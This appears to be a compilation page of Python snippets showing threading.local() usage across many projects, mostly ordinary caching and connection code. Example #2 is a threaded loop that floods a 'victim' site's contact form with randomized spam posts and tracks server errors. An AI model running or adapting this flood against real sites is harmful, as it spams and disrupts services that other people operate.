Example #1
0
def list_roles():
    roles = getattr(threading.local(), "roles", None)
    if roles is None:
        roleapi = RoleAPI()
        roles = dict([(r, roleapi.info(r)) for r in roleapi.list()])
        setattr(threading.local(), "roles", roles)
    return roles
Example #2
0
 def run(self):
     global threadLock
     s = threading.local()
     self.__req = self.__victim + '/contact-info'
     self.__headers = {'Referer': self.__req, 
                       'Content-Type': 'multipart/form-data; boundary=---------------------------29713827018367436031035745563'}
     # Use a backoff sleep time to avoid all threads starting at once
     time.sleep(random.random())
     session = threading.local()
     session = requests.Session()
     while self.__running:
         self.__randstr = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(8))
         self.__data = '-----------------------------29713827018367436031035745563\x0d\x0a' \
                       'Content-Disposition: form-data; name=\"form.widgets.sender_fullname\"\x0d\x0a\x0d\x0aspammer ' + self.__randstr + '\x0d\x0a' \
                       '-----------------------------29713827018367436031035745563\x0d\x0a' \
                       'Content-Disposition: form-data; name=\"form.widgets.sender_from_address\"\x0d\x0a\x0d\x0aspam-' + self.__randstr + '@nowhere.org\x0d\x0a' \
                       '-----------------------------29713827018367436031035745563\x0d\x0a' \
                       'Content-Disposition: form-data; name=\"form.widgets.subject\"\x0d\x0a\x0d\x0aspam ' + self.__randstr + '\x0d\x0a' \
                       '-----------------------------29713827018367436031035745563\x0d\x0a' \
                       'Content-Disposition: form-data; name=\"form.widgets.message\"\x0d\x0a\x0d\x0ajust_spam_' + self.__randstr + '\x0d\x0a' \
                       '-----------------------------29713827018367436031035745563\x0d\x0a' \
                       'Content-Disposition: form-data; name=\"form.buttons.send\"\x0d\x0a\x0d\x0aSenden\x0d\x0a' \
                       '-----------------------------29713827018367436031035745563--\x0d\x0a'
         try:
             self.__r = session.post(self.__req, headers=self.__headers, data=self.__data, verify = False)
             self.__e = self.__r.status_code
             self.__h = self.__r.headers
             self.__c = self.__r.content
             if self.__e >= 500: s = "5"
             else: s = "."
             # No need for thread safety here... Hrrhrrhrr :)
             sys.stdout.write(s)
         except (requests.ConnectionError):
             sys.stdout.write("E")
     pass
Example #3
0
def list_filters():
    filters = getattr(threading.local(), "filters", None)
    if filters is None:
        filterapi = FilterAPI()
        filters = dict([(f['id'], f) for f in filterapi.filters()])
        setattr(threading.local(), "filters", filters)
    return filters
Example #4
0
    def test_create_local_subclass_init_args(self):
        with self.assertRaisesRegex(TypeError,
                                    "Initialization arguments are not supported"):
            local("foo")

        with self.assertRaisesRegex(TypeError,
                                    "Initialization arguments are not supported"):
            local(kw="foo")
Example #5
0
def NewCursor():
 global connection
 if not connection:
  try:
   connection = threading.local().connection
  except:
   connection = NewConnection()
  threading.local().connection = connection
 return connection.cursor()
Example #6
0
 def add_request(self,req_dict):
     if hasattr(threading.local(), 'ds_request'):
         local_req = getattr(threading.local(),'ds_request')
     else:
         local_req = {'cache':True}
     if 'cache' in req_dict and str(req_dict['cache']).lower() == 'false':
         local_req['cache'] = False
     
     setattr(threading.local(), 'ds_request', local_req)
Example #7
0
def _browser():
	""" Returns a thread-bound Browser object. The browser is initialized when created. """

	if hasattr(threading.local(), "browser"):
		return threading.local().browser
	else:
		browser = mechanize.Browser()
		_initialize(browser)
		threading.local().browser = browser

		return browser
Example #8
0
 def trapExit( code ):
     """
     Cherrypy likes to call os._exit() which causes the interpreter to 
     bomb without a chance of catching it. This sucks. This function
     will replace os._exit() and throw an exception instead
     """
     if hasattr( threading.local(), "isMain" ) and threading.local().isMain:
         # The main thread should raise an exception
         sys.stderr.write("*******EXIT WAS TRAPPED**********\n")
         raise RuntimeError, "os._exit() was called in the main thread"
     else:        
         # os._exit on child threads should just blow away the thread
         raise SystemExit, "os._exit() was called in a child thread. " +\
                           "Protecting the interpreter and trapping it"
Example #9
0
 def run(self):
     serverip = threading.local()
     _timeout = threading.local()
     serverip = self.kwargs['server']
     _timeout = self.kwargs['timeout']
     _lock = self.kwargs['lock']
     with _lock:
         print 'monitoring ' + serverip + ' with timeout ' +\
             str(_timeout)
     if syslog:
         syslog.syslog('monitoring ' + serverip)
     count = 0
     while (1):
         for domain in config.domains():
             startTime = datetime.datetime.now()
             try:
                 req = threading.local()
                 req = DNS.Request(domain, qtype='A',
                                   server=serverip,
                                   timeout=_timeout).req()
                 endTime = datetime.datetime.now()
                 duration = threading.local()
                 duration = _convert_milliseconds(endTime - startTime)
                 if req.header['status'] == 'NOERROR':
                     if config.verbose():
                         with _lock:
                             print domain + '@' + serverip + ' OK'
                     statusQueue.put('OK' +
                                     ' ' +
                                     serverip +
                                     ' ' +
                                     domain +
                                     ' ' +
                                     str(duration))
             except Exception:
                 endTime = datetime.datetime.now()
                 duration = _convert_milliseconds(endTime - startTime)
                 statusQueue.put('BAD ' +
                                 serverip +
                                 ' ' +
                                 domain +
                                 ' ' +
                                 str(duration))
         sleep(config.frequency())
         if (config.cycles()):
             count += 1
             cycles = config.cycles()
             if (count >= cycles):
                 break
Example #10
0
def get_repos(reload=False):
    if reload:
        repos = None
    else:
        repos = getattr(threading.local(), "repos", None)
    if repos is None:
        # this looks inefficient, and it is, but repos has to be fully
        # loaded before we can call _load_repo_extras(), so we have to
        # do this in two separate loops
        repoapi = RepositoryAPI()
        repos = dict([(r["id"], r) for r in repoapi.repositories(dict())])
        for repo in repos.values():
            _load_repo_extras(repo, repos=repos)
        setattr(threading.local(), "repos", repos)
    return repos
Example #11
0
    def __init__(self,
                 servers=None,
                 timeout=None,
                 ca_cert=None,
                 verify_ssl_cert=False,
                 error_trace=False,
                 cert_file=None,
                 key_file=None):
        if not servers:
            servers = [self.default_server]
        else:
            servers = _to_server_list(servers)
        self._active_servers = servers
        self._inactive_servers = []
        self._http_timeout = timeout
        pool_kw = _pool_kw_args(ca_cert, verify_ssl_cert)
        pool_kw['cert_file'] = cert_file
        pool_kw['key_file'] = key_file
        self.server_pool = {}
        self._update_server_pool(servers, timeout=timeout, **pool_kw)
        self._pool_kw = pool_kw
        self._lock = threading.RLock()
        self._local = threading.local()

        self.path = self.SQL_PATH
        if error_trace:
            self.path += '?error_trace=1'
 def __init__(self, databases=None):
     """
     databases is an optional dictionary of database definitions (structured
     like settings.DATABASES).
     """
     self._databases = databases
     self._connections = local()
Example #13
0
 def __init__(self, preprocessors=None):
     self.use_default_preprocessors = False
     if isinstance(preprocessors, Iterable):
         self.preprocessors = tuple(preprocessors)
     elif preprocessors:
         self.preprocessors = (preprocessors,)
     self.__tls = threading.local()
Example #14
0
 def __init__(self, locks):
     if not isinstance(locks, tuple):
         locks = tuple(locks)
     if len(locks) <= 0:
         raise ValueError("Zero locks requested")
     self._locks = locks
     self._local = threading.local()
Example #15
0
def reset_translations():
    import gettext
    from django.utils.translation import trans_real
    gettext._translations = {}
    trans_real._translations = {}
    trans_real._default = None
    trans_real._active = threading.local()
Example #16
0
 def __init__(self):
     self._key_to_registration = dict()
     self._singleton_instances = dict()
     self._singleton_instances_lock = threading.Lock()
     self._weak_references = WeakValueDictionary()
     self._weak_references_lock = threading.Lock()
     self._thread_local = threading.local()
Example #17
0
    def _load_tile(self, tile):
        # global db context cannot be shared across threads.
        ctx = threading.local()
        if not hasattr(ctx, "db"):
            ctx.db = sqlite3.connect(self.filename)

        # get the right tile
        c = ctx.db.cursor()
        c.execute(
            ("SELECT tile_data FROM tiles WHERE "
            "zoom_level=? AND tile_column=? AND tile_row=?"),
            (tile.zoom, tile.tile_x, tile.tile_y))
        # print "fetch", tile.zoom, tile.tile_x, tile.tile_y
        row = c.fetchone()
        if not row:
            tile.state = "done"
            return

        # no-file loading
        try:
            data = io.BytesIO(row[0])
        except:
            # android issue, "buffer" does not have the buffer interface
            # ie row[0] buffer is not compatible with BytesIO on Android??
            data = io.BytesIO(bytes(row[0]))
        im = CoreImage(data, ext='png',
                filename="{}.{}.{}.png".format(tile.zoom, tile.tile_x,
                    tile.tile_y))

        if im is None:
            tile.state = "done"
            return

        return self._load_tile_done, (tile, im, )
Example #18
0
    def __init__(self, size, **kwargs):
        if not isinstance(size, int):
            raise TypeError("Pool 'size' arg must be an integer")

        if not size > 0:
            raise ValueError("Pool 'size' arg must be greater than zero")

        logger.debug(
            "Initializing connection pool with %d connections", size)

        self._lock = threading.Lock()
        self._queue = Queue.LifoQueue(maxsize=size)
        self._thread_connections = threading.local()

        connection_kwargs = kwargs
        connection_kwargs['autoconnect'] = False

        for i in xrange(size):
            connection = Connection(**connection_kwargs)
            self._queue.put(connection)

        # The first connection is made immediately so that trivial
        # mistakes like unresolvable host names are raised immediately.
        # Subsequent connections are connected lazily.
        with self.connection():
            pass
        def setUp(self):
            """
            Clear cached appstore connection
            """
            tank.util.shotgun.connection._g_sg_cached_connections = threading.local()
            tank.set_authenticated_user(None)

            # Prevents from connecting to Shotgun.
            self._server_caps_mock = patch("tank_vendor.shotgun_api3.Shotgun.server_caps")
            self._server_caps_mock.start()
            self.addCleanup(self._server_caps_mock.stop)

            # Avoids crash because we're not in a pipeline configuration.
            self._get_api_core_config_location_mock = patch(
                "tank.util.shotgun.connection.__get_api_core_config_location",
                return_value="unused_path_location"
            )
            self._get_api_core_config_location_mock.start()
            self.addCleanup(self._get_api_core_config_location_mock.stop)

            # Mocks app store script user credentials retrieval
            self._get_app_store_key_from_shotgun_mock = patch(
                "tank.descriptor.io_descriptor.appstore.IODescriptorAppStore."
                "_IODescriptorAppStore__get_app_store_key_from_shotgun",
                return_value=("abc", "123")
            )
            self._get_app_store_key_from_shotgun_mock.start()
            self.addCleanup(self._get_app_store_key_from_shotgun_mock.stop)
Example #20
0
 def __init__(
         self,
         parent=None,
         **kwargs
 ):
     self._construction_complete = False
     self._database = kwargs.pop('database', not_set)
     explicit_kwargs = list(kwargs)
     defaults = parent or settings.default
     if defaults is not None:
         for setting in all_settings.values():
             if kwargs.get(setting.name, not_set) is not_set:
                 kwargs[setting.name] = getattr(defaults, setting.name)
             elif setting.validator:
                 kwargs[setting.name] = setting.validator(
                     kwargs[setting.name])
         if self._database is not_set:
             self._database = defaults.database
     for name, value in kwargs.items():
         if name not in all_settings:
             raise InvalidArgument(
                 'Invalid argument %s' % (name,))
         setattr(self, name, value)
     self.storage = threading.local()
     self._construction_complete = True
     for k in explicit_kwargs:
         deprecation = all_settings[k].deprecation
         if deprecation:
             note_deprecation(deprecation, self)
Example #21
0
    def __init__(self, hub):
        self.badge_rules = []
        self.hub = hub

        super(FedoraBadgesConsumer, self).__init__(hub)

        self.consume_delay = int(self.hub.config.get('badges.consume_delay',
                                                     self.consume_delay))
        self.delay_limit = int(self.hub.config.get('badges.delay_limit',
                                                   self.delay_limit))

        # Five things need doing at start up time
        # 0) Set up a request local to hang thread-safe db sessions on.
        # 1) Initialize our connection to the tahrir DB and perform some
        #    administrivia.
        # 2) Initialize our connection to the datanommer DB.
        # 3) Load our badge definitions and rules from YAML.
        # 4) Initialize fedmsg so that those listening to us can handshake.

        # Thread-local stuff
        self.l = threading.local()

        # Tahrir stuff.
        self._initialize_tahrir_connection()

        # Datanommer stuff
        self._initialize_datanommer_connection()

        # Load badge definitions
        directory = hub.config.get("badges.yaml.directory", "badges_yaml_dir")
        self.badge_rules = self._load_badges_from_yaml(directory)
Example #22
0
def getConf():
    _data = threading.local()
    if hasattr(_data, 'conf'):
        log.debug(_("Returning thread local configuration"))
        return _data.conf

    return conf
Example #23
0
 def _get_dict():
     if not Timing.context:
         import threading
         Timing.context = threading.local()
     if not hasattr(Timing.context, 'dict'):
         Timing.context.dict = {}
     return Timing.context.dict
Example #24
0
    def __init__(
        self, ns, logical_home_folder,
        inherits_from=None, inheritable_folders=None):
        """Creates a new instance of the datastore-backed file system.

        Args:
            ns: A datastore namespace to use for storing all data and metadata.
            logical_home_folder: A logical home dir of all files (/a/b/c/...).
            inherits_from: A file system to use for the inheritance.
            inheritable_folders: A list of folders that support inheritance.

        Returns:
            A new instance of the object.

        Raises:
            Exception: if invalid inherits_from is given.
        """

        if inherits_from and not isinstance(
                inherits_from, LocalReadOnlyFileSystem):
            raise Exception('Can only inherit from LocalReadOnlyFileSystem.')

        self._ns = ns
        self._logical_home_folder = AbstractFileSystem.normpath(
            logical_home_folder)
        self._inherits_from = inherits_from
        self._inheritable_folders = []
        self._cache = threading.local()

        if inheritable_folders:
            for folder in inheritable_folders:
                self._inheritable_folders.append(AbstractFileSystem.normpath(
                    folder))
Example #25
0
def _reset():
    '''
    Reset the thread local.
    '''
    import django_mobile
    del django_mobile._local
    django_mobile._local = threading.local()
Example #26
0
    def __init__(self, url, schema=None, reflectMetadata=True, engine_kwargs=None):
        if engine_kwargs is None:
            engine_kwargs = {}

        if url.startswith("postgres"):
            engine_kwargs.setdefault("poolclass", NullPool)

        self.lock = threading.RLock()
        self.local = threading.local()
        if "?" in url:
            url, query = url.split("?", 1)
            query = parse_qs(query)
            if schema is None:
                # le pop
                schema_qs = query.pop("schema", query.pop("searchpath", []))
                if len(schema_qs):
                    schema = schema_qs.pop()
            if len(query):
                url = url + "?" + urlencode(query, doseq=True)
        self.schema = schema
        self.engine = create_engine(url, **engine_kwargs)
        self.url = url
        self.metadata = MetaData(schema=schema)
        self.metadata.bind = self.engine
        if reflectMetadata:
            self.metadata.reflect(self.engine)
        self._tables = {}
Example #27
0
 def _blank_copy(self, c):
     super(FullFrontend, self)._blank_copy(c)
     c._track = self._track
     c._solver_backend = self._solver_backend
     c.timeout = self.timeout
     c._tls = threading.local()
     c._to_add = []
Example #28
0
 def __init__(self, solver_backend, timeout=None, track=False, **kwargs):
     ConstrainedFrontend.__init__(self, **kwargs)
     self._track = track
     self._solver_backend = solver_backend
     self.timeout = timeout if timeout is not None else 300000
     self._tls = threading.local()
     self._to_add = []
    def __init__(self, sqluri, standard_collections=False, **dbkwds):

        self.sqluri = sqluri
        self.dbconnector = DBConnector(sqluri, **dbkwds)

        # There doesn't seem to be a reliable cross-database way to set the
        # initial value of an autoincrement column.  Fake it by inserting
        # a row into the table at the desired start id.
        self.standard_collections = standard_collections
        if self.standard_collections and dbkwds.get("create_tables", False):
            zeroth_id = FIRST_CUSTOM_COLLECTION_ID - 1
            with self.dbconnector.connect() as connection:
                params = {"collectionid": zeroth_id, "name": ""}
                try:
                    connection.query("INSERT_COLLECTION", params)
                except IntegrityError:
                    pass

        # A local in-memory cache for the name => collectionid mapping.
        self._collections_by_name = {}
        self._collections_by_id = {}
        if self.standard_collections:
            for id, name in STANDARD_COLLECTIONS:
                self._collections_by_name[name] = id
                self._collections_by_id[id] = name

        # A thread-local to track active sessions.
        self._tldata = threading.local()
Example #30
0
 def _ana_setstate(self, s):
     backend_name, self.timeout, self._track, base_state = s
     self._solver_backend = backends._backends_by_type[backend_name]
     # self._tls = None
     self._tls = threading.local()
     self._to_add = []
     ConstrainedFrontend._ana_setstate(self, base_state)
Example #31
0
 def __init__(self):
     self.local_res = threading.local()
Example #32
0
from tensorflow.python.eager import execute
from tensorflow.python.eager import tape
from tensorflow.python.eager.graph_only_ops import graph_placeholder
from tensorflow.python.framework import c_api_util
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes as dtypes_module
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.ops import gradients_impl
from tensorflow.python.util import compat
from tensorflow.python.util import nest
from tensorflow.python.util import tf_decorator

# Thread-local storage for tfe Tensors which are referenced while evaluating a
# graph-mode function.
_scoped_captures = threading.local()
# _scoped_captures.tensors is either None or a map from Tensor id to a pair
# of a tfe tensor and its corresponding placeholder to pass as a function
# argument. The value should be None unless we're in function definition
# context.
_scoped_captures.tensors = None


@contextlib.contextmanager
def capture_tensors(captures):
    old = _scoped_captures.__dict__.get("tensors", None)
    try:
        _scoped_captures.tensors = captures
        yield
    finally:
        _scoped_captures.tensors = old
Example #33
0
from __future__ import print_function

import collections
import inspect
import linecache
import sys
import threading

# Names for indices into TF traceback tuples.
TB_FILENAME = 0
TB_LINENO = 1
TB_FUNCNAME = 2
TB_CODEDICT = 3  # Dictionary of Python interpreter state.


stacks = threading.local()


def _source_mappers():
  if not hasattr(stacks, 'source_mapper'):
    stacks.source_mapper = []
  return stacks.source_mapper


def _source_filters():
  if not hasattr(stacks, 'source_filter'):
    stacks.source_filter = []
  return stacks.source_filter


class StackTraceMapper(object):
Example #34
0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Contains AutoCastVariable, a variable which automatically casts itself."""

import tensorflow.compat.v2 as tf

import threading
from keras.distribute import distributed_training_utils

# _autocast_dtype.dtype is the dtype AutoCastVariables should be cast to, or
# None if AutoCastVariables should not be cast.
_autocast_dtype = threading.local()


def numpy_text(tensor, is_repr=False):
    """Human readable representation of a tensor's numpy value."""
    if tensor.dtype.is_numpy_compatible:
        # pylint: disable=protected-access
        text = repr(tensor._numpy()) if is_repr else str(tensor._numpy())
        # pylint: enable=protected-access
    else:
        text = '<unprintable>'
    if '\n' in text:
        text = '\n' + text
    return text

Example #35
0
except ImportError:
    have_minify = False

try:
    import simplejson as sj  #external installed library
except:
    try:
        import json as sj  #standard installed library
    except:
        import contrib.simplejson as sj  #pure python library

regex_session_id = re.compile('^([\w\-]+/)?[\w\-\.]+$')

__all__ = ['Request', 'Response', 'Session']

current = threading.local()  # thread-local storage for request-scope globals

css_template = '<link href="%s" rel="stylesheet" type="text/css" />'
js_template = '<script src="%s" type="text/javascript"></script>'
coffee_template = '<script src="%s" type="text/coffee"></script>'
typescript_template = '<script src="%s" type="text/typescript"></script>'
less_template = '<link href="%s" rel="stylesheet/less" type="text/css" />'
css_inline = '<style type="text/css">\n%s\n</style>'
js_inline = '<script type="text/javascript">\n%s\n</script>'


def copystream_progress(request, chunk_size=10**5):
    """
    copies request.env.wsgi_input into request.body
    and stores progress upload status in cache_ram
    X-Progress-ID:length and X-Progress-ID:uploaded
Example #36
0
_ITEMS_PROCESSOR_ARGS_LEN = 0
"""Number of arguments accepted by items processor."""

_I18N_TREES = []
"""Stores aliases of trees supporting internationalization."""

_DYNAMIC_TREES = {}
"""Holds trees dynamically loaded from project apps."""

_IDX_ORPHAN_TREES = 'orphans'
"""Dictionary index in `_DYNAMIC_TREES` for orphaned trees list."""

_IDX_TPL = '%s|:|%s'
"""Name template used as dictionary index in `_DYNAMIC_TREES`."""

_THREAD_LOCAL = local()
_THREAD_SITETREE = 'sitetree'

_CONTEXT_FLATTEN = VERSION >= (1, 11)

_UNSET = set()  # Sentinel


def get_sitetree():
    """Returns SiteTree (thread-singleton) object, implementing utility methods.

    :rtype: SiteTree
    """
    sitetree = getattr(_THREAD_LOCAL, _THREAD_SITETREE, None)

    if sitetree is None:
Example #37
0
from logging.config import dictConfig

from connect.config import Config
from connect.logger import logger

# Configure logging
if os.path.exists('/etc/cloudblue-connector/config-logging.json'):
    with open(
            '/etc/cloudblue-connector/config-logging.json') as config_log_file:
        settings = json.load(config_log_file)
        dictConfig(settings['logging'])

# Set connect log level / default level ERROR
logger.setLevel('DEBUG')

context_data = threading.local()
context_data.request_id = None


class ContextFilter(logging.Filter):
    """
    This is a filter which injects contextual information into the log record.
    """
    def filter(self, record):
        if context_data.request_id:
            record.name += "." + context_data.request_id
        return True


class PasswordFilter(logging.Filter):
    """
Example #38
0
from django.utils.http import urlquote
from django.utils.importlib import import_module
from django.utils.module_loading import module_has_submodule
from django.utils.regex_helper import normalize
from django.utils import six
from django.utils.translation import get_language

_resolver_cache = {}  # Maps URLconf modules to RegexURLResolver instances.
_ns_resolver_cache = {}  # Maps namespaces to RegexURLResolver instances.
_callable_cache = {
}  # Maps view and url pattern names to their view functions.

# SCRIPT_NAME prefixes for each thread are stored here. If there's no entry for
# the current thread (which is the only one we ever access), it is assumed to
# be empty.
_prefixes = local()

# Overridden URLconfs for each thread are stored here.
_urlconfs = local()


class ResolverMatch(object):
    def __init__(self,
                 func,
                 args,
                 kwargs,
                 url_name=None,
                 app_name=None,
                 namespaces=None):
        self.func = func
        self.args = args
Example #39
0
 def unoconv_client(self):
     if not hasattr(self, '_unoconv_client'):
         self._unoconv_client = threading.local()
     if not hasattr(self._unoconv_client, 'session'):
         self._unoconv_client.session = requests.Session()
     return self._unoconv_client.session
Example #40
0
import threading
import time
from functools import partial

from django.apps import apps
from django.conf import settings
from django.db.models.signals import pre_save
from django.utils.deprecation import MiddlewareMixin

from auditlog.models import LogEntry

threadlocal = threading.local()


class AuditlogMiddleware(MiddlewareMixin):
    """
    Middleware to couple the request's user to log items. This is accomplished by currying the signal receiver with the
    user from the request (or None if the user is not authenticated).
    """

    def process_request(self, request):
        """
        Gets the current user from the request and prepares and connects a signal receiver with the user already
        attached to it.
        """
        # Initialize thread local storage
        threadlocal.auditlog = {
            'signal_duid': (self.__class__, time.time()),
            'remote_addr': request.META.get('REMOTE_ADDR'),
        }
Example #41
0
import threading

current_user_store = threading.local()


class GlobalUserMiddleware(object):
    def process_request(self, request):
        if request.user:
            current_user_store.user = request.user
        return None

    def process_response(self, request, response):
        if hasattr(current_user_store, 'user'):
            del current_user_store.user
        return response

    def process_exception(self, request, exception):
        if hasattr(current_user_store, 'user'):
            del current_user_store.user
        return None
      return
    # Under eager mode. Eagerly execute check_numerics op.
    for slot, output in enumerate(outputs):
      if (output.dtype.is_floating and
          (op_type_bytes, slot) not in IGNORE_OP_OUTPUTS):
        array_ops.check_numerics(
            output,
            get_check_numerics_error_message(
                slot, len(outputs), op_type, output, inputs,
                stack_height_limit=_state.config.stack_height_limit,
                path_length_limit=_state.config.path_length_limit))


CheckNumericsConfig = collections.namedtuple(
    "CheckNumericsConfig", "stack_height_limit path_length_limit")
_state = threading.local()


@tf_export("debugging.enable_check_numerics")
def enable_check_numerics(stack_height_limit=30,
                          path_length_limit=50):
  r"""Enable tensor numerics checking in an eager/graph unified fashion.

  The numerics checking mechanism will cause any TensorFlow eager execution or
  graph execution to error out as soon as an op's output tensor contains
  infinity or NaN.

  This method is idempotent. Calling it multiple times has the same effect
  as calling it once.

  This method takes effect only on the thread in which it is called.
Example #43
0
File: core.py Project: spotify/klio
class KlioContext(object):
    """Context related to the currently running job.

    Available to transforms via one of the :ref:`KlioContext decorators
    <klio-context-decorators>`.
    """

    _thread_local = threading.local()

    def __init__(self):
        self.__transform_name = None

    def _create_klio_job_obj(self):
        klio_job = klio_pb2.KlioJob()
        klio_job.job_name = self.config.job_name
        klio_job.gcp_project = self.config.pipeline_options.project
        klio_job_str = klio_job.SerializeToString()
        return klio_job_str

    def _get_metrics_registry(self):
        native_metrics_client = native_metrics.NativeMetricsClient(self.config)
        clients = [native_metrics_client]
        use_logger, use_shumway = None, None
        metrics_config = self.config.job_config.metrics

        # use_logger/use_shumway could be False (turn off),
        # None (use default config), or a dict of configured values
        use_logger = metrics_config.get("logger")
        use_shumway = metrics_config.get("shumway")

        # TODO: set runner in OS environment (via klio-exec), since
        #       the runner defined in config could be overwritten via
        #       `--direct-runner`.
        #       i.e.: runner = os.getenv("BEAM_RUNNER", "").lower()
        runner = self.config.pipeline_options.runner

        if kvars.KlioRunner.DIRECT_RUNNER != runner:
            if use_logger is None:
                use_logger = False

        # use shumway when running on DirectGKERunner unless it's explicitly
        # turned off/set to False. Don't set it to True if it's set to False
        # or it's a dictionary (aka has some configuration)
        if kvars.KlioRunner.DIRECT_GKE_RUNNER == runner:
            if use_shumway is None:
                use_shumway = True
        # shumway only works on DirectGKERunner, so we explicitly set it
        # to False
        else:
            use_shumway = False

        if use_logger is not False:
            logger_client = metrics_logger.MetricsLoggerClient(self.config)
            clients.append(logger_client)

        if use_shumway is not False:
            shumway_client = shumway.ShumwayMetricsClient(self.config)
            clients.append(shumway_client)

        return metrics_client.MetricsRegistry(
            clients, transform_name=self._transform_name)

    @property
    def config(self):
        """A ``KlioConfig`` instance representing the job's configuration."""
        return RunConfig.get()

    @property
    def job(self):
        """An instance of :ref:`kliojob` of the current job."""
        klio_job = getattr(self._thread_local, "klio_job", None)
        if not klio_job:
            self._thread_local.klio_job = self._create_klio_job_obj()
        return self._thread_local.klio_job

    @property
    def logger(self):
        """A namespaced logger.

        Equivalent to ``logging.getLogger("klio")``.
        """
        klio_logger = getattr(self._thread_local, "klio_logger", None)
        if not klio_logger:
            self._thread_local.klio_logger = logging.getLogger("klio")
        return self._thread_local.klio_logger

    @property
    def metrics(self):
        """A metrics registry instance.

        See :ref:`metrics <metrics>` for more information."""
        metrics_registry = getattr(self._thread_local, "klio_metrics", None)
        if not metrics_registry:
            self._thread_local.klio_metrics = self._get_metrics_registry()
        return self._thread_local.klio_metrics

    # <-- private/internal attributes -->
    @property
    def _transform_name(self):
        return self.__transform_name

    @_transform_name.setter
    def _transform_name(self, name):
        self.__transform_name = name
Example #44
0
class action:
    """@action(...) is a decorator for functions to be exposed as actions"""

    current = threading.local()
    registered = set()
    app_name = "_default"

    def __init__(self, path, **kwargs):
        self.path = path
        self.kwargs = kwargs

    @staticmethod
    def uses(*fixtures_in):
        """Find all fixtures, including dependencies, topologically sorted"""
        fixtures = []
        reversed_fixtures = []
        stack = list(fixtures_in)
        while stack:
            fixture = stack.pop()
            reversed_fixtures.append(fixture)
            for other in getattr(fixture, "__prerequisites__", []):
                stack.append(other)
        for fixture in reversed(reversed_fixtures):
            if isinstance(fixture, str):
                fixture = Template(fixture)
            if not fixture in fixtures:
                fixtures.append(fixture)

        def decorator(func):
            @functools.wraps(func)
            def wrapper(*args, **kwargs):
                # data shared by all fixtures in the piplined for each request
                shared_data = {"template_context": {}}
                try:
                    [obj.on_request() for obj in fixtures]
                    ret = func(*args, **kwargs)
                    for obj in fixtures:
                        ret = obj.transform(ret, shared_data)
                    [obj.on_success() for obj in fixtures]
                    return ret
                except HTTP:
                    [obj.on_success() for obj in fixtures]
                    raise
                except Exception:
                    [obj.on_error() for obj in fixtures]
                    raise

            return wrapper

        return decorator

    @staticmethod
    def requires(*requirements):
        """Enforces requirements or calls bottle.abort(401)"""
        def decorator(func):
            @functools.wraps(func)
            def wrapper(*args, **kwargs):
                for requirement in requirements:
                    if not requirement():
                        bottle.abort(401)
                return func(*args, **kwargs)

            return wrapper

        return decorator

    @staticmethod
    def catch_errors(app_name, func):
        """Catches and logs errors in an action; also sets request.app_name"""
        @functools.wraps(func)
        def wrapper(*func_args, **func_kwargs):
            try:
                request.app_name = app_name
                ret = func(*func_args, **func_kwargs)
                if isinstance(ret, dict):
                    response.headers["Content-Type"] = "application/json"
                    ret = dumps(ret)
                return ret
            except HTTP as http:
                response.status = http.status
                return ""
            except bottle.HTTPResponse:
                raise
            except Exception:
                logging.error(traceback.format_exc())
                try:
                    ticket = ErrorStorage().log(request.app_name,
                                                get_error_snapshot())
                except Exception:
                    logging.error(traceback.format_exc())
                    ticket = "unknown"
                return error_page(500,
                                  button_text=ticket,
                                  href="/_dashboard/ticket/" + ticket)

        return wrapper

    def __call__(self, func):
        """Building the decorator"""
        app_name = action.app_name
        path = ("/" if app_name == "_default" else "/%s/" %
                app_name) + self.path  # the _default app has no prefix
        if not func in self.registered:
            func = action.catch_errors(app_name, func)
        func = bottle.route(path, **self.kwargs)(func)
        if path.endswith("/index"):  # /index is always optional
            func = bottle.route(path[:-6] or "/", **self.kwargs)(func)
        self.registered.add(func)
        return func
Example #45
0
from bugbug import bugzilla, db, repository
from bugbug.models.regressor import (
    BUG_FIXING_COMMITS_DB,
    BUG_INTRODUCING_COMMITS_DB,
    TOKENIZED_BUG_INTRODUCING_COMMITS_DB,
)
from bugbug.utils import (
    ThreadPoolExecutorResult,
    download_and_load_model,
    zstd_compress,
)

basicConfig(level=INFO)
logger = getLogger(__name__)

thread_local = threading.local()

MAX_MODIFICATION_NUMBER = 50
RELATIVE_START_DATE = relativedelta(years=2, months=6)
# Only needed because mercurial<->git mapping could be behind.
RELATIVE_END_DATE = relativedelta(days=7)

IGNORED_COMMITS_DB = "data/ignored_commits.json"
db.register(
    IGNORED_COMMITS_DB,
    "https://s3-us-west-2.amazonaws.com/communitytc-bugbug/data/ignored_commits.json.zst",
    1,
)


class RegressorFinder(object):
Example #46
0
# is same as ThreadLocal in Java, used to save variant by thread,a variant is available in thread
import threading

local_school = threading.local()


def process_student():
    print 'Hello, %s (in %s)' % (local_school.student,
                                 threading.current_thread().name)


def process_thread(name):
    # bind a student to Threadlocal
    local_school.student = name
    process_student()


t1 = threading.Thread(target=process_thread, args=('Alice', ), name='Thread-A')
t2 = threading.Thread(target=process_thread, args=('Bob', ), name='Thread-B')
t1.start()
t2.start()
t1.join()
t2.join()

# you can understander a ThreadLocal obj is a dict,and the key is a thread obj,but you can't get the value of thread A in thread B
Example #47
0
"""Local storage of variables using weak references"""

import threading
import weakref


class WeakLocal(threading.local):
    def __getattribute__(self, attr):
        rval = super(WeakLocal, self).__getattribute__(attr)
        if rval:  # pragma: no cover
            # NOTE(mikal): this bit is confusing. What is stored is a weak
            # reference, not the value itself. We therefore need to lookup
            # the weak reference and return the inner value here.
            rval = rval()
        return rval

    def __setattr__(self, attr, value):
        value = weakref.ref(value)
        return super(WeakLocal, self).__setattr__(attr, value)


# NOTE(mikal): the name "store" should be deprecated in the future
store = WeakLocal()

# A "weak" store uses weak references and allows an object to fall out of scope
# when it falls out of scope in the code that uses the thread local storage. A
# "strong" store will hold a reference to the object so that it never falls out
# of scope.
weak_store = WeakLocal()
strong_store = threading.local()
Example #48
0
# This paramstyle uses '%s' parameters.
paramstyle = 'format'

# --- private global constants

# Values of seconds are with 3 decimal places in SF, but they are rounded to
# whole seconds for the most of fields.
SALESFORCE_DATETIME_FORMAT = '%Y-%m-%dT%H:%M:%S.%f+0000'

# ---

request_count = 0  # global counter

connect_lock = threading.Lock()
thread_connections = threading.local()


class RawConnection(object):
    """
    parameters:
